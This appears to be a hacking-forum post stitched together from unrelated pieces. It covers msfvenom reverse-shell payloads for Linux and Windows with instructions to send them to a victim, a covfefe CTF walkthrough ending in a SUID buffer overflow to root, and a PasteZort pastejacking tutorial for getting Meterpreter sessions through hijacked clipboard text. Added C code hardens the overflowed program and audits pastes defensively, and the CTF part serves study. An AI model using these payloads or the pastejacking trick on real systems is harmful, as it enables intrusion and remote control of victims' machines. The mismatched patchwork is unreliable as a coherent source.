msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once the payload is executed, it creates a reverse TCP connection back to our Kali machine, giving us a Meterpreter session, as shown in the image below.
[Image: 26.png?w=687&ssl=1]
Powershell Payload
Open a Kali terminal and type the command mentioned below:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

[Image: 23.png?w=687&ssl=1]
Once the payload has been generated, send it to the victim to execute on their Windows machine and start the multi handler as shown in the image below.
msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once the payload is executed, it creates a reverse connection and hands us a shell, as shown in the image below.
[Image: 24.png?w=687&ssl=1]

Today we are going to take on another challenge known as “covfefe”. It is a Debian 9 based boot-to-root VM, originally created as a CTF for SecTalks_BNE. The author of this VM is “Tim Kent”. We have to find 3 flags to complete the challenge.
You can download this VM from the link given in the original post.


Security Level: Beginner
Penetration Methodology:
Scanning
  • Netdiscover
  • Nmap
Enumeration
  • Web spidering
  • Directory enumeration
Exploiting
  • SSH login
  • John the Ripper
Privilege Escalation
  • Exploiting SUID executables
Capture the Flag
Walkthrough
Scanning
Let’s start off by scanning the network and identifying host IPs. As illustrated below, we identify the target host’s IP as 192.168.1.101.
netdiscover

[Image: 1.png?w=687&ssl=1]
Time to scan the target’s IP with Nmap.
nmap -A 192.168.1.101

As you can see in the following screenshot, ports 22, 80 and 31337 are open.
[Image: 2.png?w=687&ssl=1]
Enumeration
Browsing the IP with HTTP port 31337 doesn’t give any result.
[Image: 3.png?w=687&ssl=1]
Directory enumeration using dirb shows two interesting entries, “/.ssh” and “/robots.txt”. The Nmap scan had already shown robots.txt, but to dig deeper we went with dirb.
dirb http://192.168.1.101:31337/
[Image: 4.png?w=687&ssl=1]
Further enumeration of robots.txt using curl shows a file “/taxes” among others. As soon as we open it, we get our first flag.
curl http://192.168.1.101:31337/robots.txt

[Image: 5.png?w=687&ssl=1]
On browsing 192.168.1.101:31337/.ssh we find an SSH key pair, ‘id_rsa’ (private) and ‘id_rsa.pub’ (public), along with ‘authorized_keys’.
[Image: 6.png?w=687&ssl=1]
Opening ‘authorized_keys’ in the browser gives a download prompt, so we download it. We downloaded id_rsa the same way.
[Image: 7.png?w=687&ssl=1]
Opening authorized_keys reveals the username ‘simon’ associated with the key.
cat authorized_keys

[Image: 8.png?w=687&ssl=1]
Exploiting
Now we use the private key to connect to the VM over SSH, but it asks for a passphrase.
ssh -i id_rsa simon@192.168.1.101

[Image: 9.png?w=687&ssl=1]
We have to change its format, which can be done using a John the Ripper utility called “ssh2john.py”. It converts ‘id_rsa’ into a hash format recognised by John the Ripper. Now let’s use John the Ripper to crack this hash.

chmod +x ssh2john.py
python ssh2john.py id_rsa > hash
john hash          # runs John’s default cracking modes against the hash
john hash --show   # --show only prints results already stored in john.pot, so crack first

We find that the passphrase of the key is starwars. Now we use this passphrase along with the key to connect over SSH.
[Image: 10.png?w=687&ssl=1]
After a successful SSH login using our newly acquired passphrase, we search for SUID binaries.
ssh -i id_rsa simon@192.168.1.101
find / -perm -u=s -type f 2>/dev/null

Here we notice ‘/usr/local/bin/read_message’, which takes user input and displays a message. We provide ‘simon’ as the username when asked. The message contains a hint about the username: it should be ‘Simon’ instead of ‘simon’.
/usr/local/bin/read_message

[Image: 11.png?w=687&ssl=1]
Privilege Escalation
When we run ‘read_message’ again and provide ‘Simon’ as the username, we get a message hinting that we can find something in root. When we enter the ‘/root’ folder and list its contents, we find two files, ‘flag.txt’ and ‘read_message.c’. We can’t read flag.txt yet. Moving on, inside ‘read_message.c’ we find our second flag.
cd /root
ls
cat flag.txt
cat read_message.c

[Image: 12.png?w=687&ssl=1]
Reading through the source code in the screenshot above, we find that when we enter a string it compares only the first 5 characters with “Simon”, and if they match it runs /usr/local/sbin/message. But the input buffer is only 20 bytes and the copy is not length-checked, so entering more than 20 bytes overflows it and the extra bytes land in the neighbouring variable that holds the program path. We therefore use ‘Simon’ for the first 5 characters, followed by 15 ‘A’s to fill the buffer, and then ‘/bin/sh’ starting at the 21st byte.
read_message
SimonAAAAAAAAAAAAAAA/bin/sh
cd /root
ls
cat flag.txt

As soon as we provide this string, we get a shell as root. Now we can read flag.txt, and with it we have found the third flag.
[Image: 13.png?w=687&ssl=1]
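As an added example (not the VM’s read_message.c, whose source is only visible in the screenshot), here is a hardened version of the check the walkthrough describes, written to show what would have stopped the overflow. The 20-byte buffer, the ‘Simon’ check and the /usr/local/sbin/message path come from the walkthrough; NAME_LEN, AUTHORIZED_NAME and the function names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hardened reconstruction of the read_message check (example code, not the
 * VM's source). The flaw described above is a fixed 20-byte input buffer
 * filled without a length check, so bytes 21 onward spill into the variable
 * holding the program path. Three changes close it:
 *  1. bound the copy and reject over-long input instead of truncating,
 *  2. compare the whole name, not just its first five characters,
 *  3. keep the program path a read-only constant that no write can reach. */

#define NAME_LEN 20                      /* same size the walkthrough quotes */
#define AUTHORIZED_NAME "Simon"
static const char *const MESSAGE_PROGRAM = "/usr/local/sbin/message";

/* Copies `input` into `out` only if it fits together with its terminator.
 * Returns 1 on success, 0 if the input is too long (out is left empty). */
int copy_name_bounded(const char *input, char *out, size_t outsz)
{
    size_t n = strlen(input);
    if (n >= outsz) {
        out[0] = '\0';
        return 0;
    }
    memcpy(out, input, n + 1);           /* n + 1 includes the NUL */
    return 1;
}

/* Full-string comparison: "SimonAAAA..." no longer passes as "Simon". */
int name_is_authorized(const char *name)
{
    return strcmp(name, AUTHORIZED_NAME) == 0;
}

/* Returns the program to run for this input, or NULL if it must be refused. */
const char *program_to_run(const char *input)
{
    char name[NAME_LEN];
    if (!copy_name_bounded(input, name, sizeof name))
        return NULL;
    if (!name_is_authorized(name))
        return NULL;
    return MESSAGE_PROGRAM;
}

int main(void)
{
    char line[256];
    printf("What is your name? ");
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    line[strcspn(line, "\r\n")] = '\0';  /* strip the newline fgets keeps */

    const char *prog = program_to_run(line);
    if (prog == NULL) {
        puts("Sorry, you are not allowed to read the message.");
        return 1;
    }
    /* Absolute path, no shell involved, argv under our control. */
    execl(prog, prog, (char *)NULL);
    perror("execl");                     /* only reached if exec failed */
    return 1;
}
```

With these checks the 27-byte string from the walkthrough is refused before it can touch anything, and even a 20-byte name that happens to start with “Simon” fails the full comparison. Independently of the code, a setuid-root helper that executes another program is a design smell on its own: the root shell here needed both the SUID bit and the overflow, and removing either closes the path.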

Pastejacking is a technique that takes over the clipboard of a machine: when we copy text from a website, that text can be laced with malicious code that executes when it is pasted on the victim’s machine. This is a very effective way to obtain a Meterpreter session because of its simplicity. All that needs to happen is that the victim copies some harmless-looking words from the browser and pastes them into the command prompt, and that’s it: session!!
We are going to walk you through the process using a tool called PasteZort.
Here’s how it happens:
The first thing you’ll need to do is get the tool from GitHub.
To keep it simple, from your Kali terminal type the following command:
git clone <PasteZort GitHub repository URL>
This will create a PasteZort folder on your Desktop with the tool in it.
[Image: 1.png?w=687&ssl=1]
Open the folder and you will see all the files you need to run this tool; the inside of the folder looks like the screenshot given below.
[Image: 2.png?w=687&ssl=1]
In order to execute the tool we first have to make the “encode.rb” file executable. Right-click “encode.rb”, open its properties, go to the “Permissions” tab and tick the “Execute” box that says “Allow executing file as program”.
[Image: 3.png?w=687&ssl=1]
Navigate to the PasteZort folder in the Kali terminal and execute the tool with “python ./PasteZOrt.py”. The tool is now running.
Now we can get started on building our pastejacking payload using the tool’s interface. We will be making a Windows payload, so at the “Objectives:” prompt type “1” to choose Windows as the target operating system.
[Image: 5.png?w=687&ssl=1]
After that, again choose option “1” under “Select Payload” to generate a Windows reverse TCP shell. Enter your IP address at “LHOST” and the port number you want the payload to communicate over at “LPORT”.
You will now get an option to enter the message you want displayed as the pastejacking text; for example, we have written “ping” and a second entry (a link that the forum has hidden).
And that’s it, your payload is ready.
You will now be asked if you would like to turn on the handler; type “Y” and press Enter.
[Image: 6.png?w=687&ssl=1]
Open a web browser on the victim machine and enter your IP in the address bar. The text you typed in the message section will appear; select the text and copy it.
[Image: 7.png?w=687&ssl=1]
Open a command prompt on the victim machine, paste the copied text and press Enter.
[Image: 8.png?w=687&ssl=1]
Go back to the Kali terminal and you will see the handler picking up the reverse TCP connection, and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.
[Image: 9.png?w=687&ssl=1]
The beauty of this tool lies in its simplicity: it has a clean interface with an intuitive workflow and gets effective results without any mess. The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.
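The defender’s side of the trick above, as an added example that is neither PasteZort’s code nor any terminal’s own: the attack only works because the clipboard content differs from what the victim saw, and because the pasted bytes carry line breaks (and sometimes control characters) that a plain terminal hands straight to the shell. The audit below makes those two properties explicit; it is the same idea behind bracketed-paste mode in modern shells and terminals, which stops a pasted newline from acting as Enter. The sample strings are constructed, and audit_paste, report and the flag names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Defender-side paste audit (hypothetical helper, added as an example).
 * Compares the text a user believes they copied with what is actually on
 * the clipboard and flags the properties pastejacking relies on. */

enum {
    PASTE_OK       = 0,
    PASTE_MISMATCH = 1 << 0, /* clipboard text != what was visibly selected  */
    PASTE_NEWLINE  = 1 << 1, /* CR/LF present: a plain terminal runs it on paste */
    PASTE_CONTROL  = 1 << 2, /* other control bytes, typically used to hide text */
    PASTE_EXTRA    = 1 << 3  /* clipboard carries bytes beyond the shown text   */
};

/* Returns a bitmask of the PASTE_* flags; PASTE_OK means "what you see is
 * what you paste" and the content is a single line of printable text. */
int audit_paste(const char *shown, const char *clipboard)
{
    int flags = PASTE_OK;
    const unsigned char *p;

    if (strcmp(shown, clipboard) != 0)
        flags |= PASTE_MISMATCH;
    if (strlen(clipboard) > strlen(shown))
        flags |= PASTE_EXTRA;

    for (p = (const unsigned char *)clipboard; *p; p++) {
        if (*p == '\n' || *p == '\r')
            flags |= PASTE_NEWLINE;
        else if (*p < 0x20 || *p == 0x7f)
            flags |= PASTE_CONTROL;
    }
    return flags;
}

/* Prints a human-readable verdict; returns 1 when the paste should be refused
 * (or at least shown to the user first), 0 when it is safe to pass through. */
int report(const char *label, const char *shown, const char *clipboard)
{
    int f = audit_paste(shown, clipboard);
    printf("%s: %s\n", label, f == PASTE_OK ? "clipboard matches, single line" : "SUSPICIOUS");
    if (f & PASTE_MISMATCH) puts("  - clipboard differs from the selected text");
    if (f & PASTE_EXTRA)    puts("  - hidden extra content present");
    if (f & PASTE_NEWLINE)  puts("  - contains a line break: would run without pressing Enter");
    if (f & PASTE_CONTROL)  puts("  - contains control characters");
    return f != PASTE_OK;
}

int main(void)
{
    /* Constructed sample data, not captured from the tool. The "hijacked"
     * clipboard appends a harmless stand-in command behind CR/LF. */
    const char *shown         = "ping 192.168.0.107";
    const char *honest_clip   = "ping 192.168.0.107";
    const char *hijacked_clip = "ping 192.168.0.107\r\necho pastejacked-demo\r\n";

    report("honest copy", shown, honest_clip);
    report("hijacked copy", shown, hijacked_clip);
    return 0;
}
```

The practical mitigations follow directly from the flags: paste into an editor or a terminal with bracketed paste enabled (bash 5.1 and zsh enable it by default, and iTerm2 warns on multi-line pastes), and treat any paste whose length or line count differs from the selection as something to read before running.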
Have fun and stay ethical.
Messages In This Thread
[Guide] How to Understanding Guide to Nmap Firewall Scan (Part 1) - by NINZA - 05-14-2020, 05:30 AM


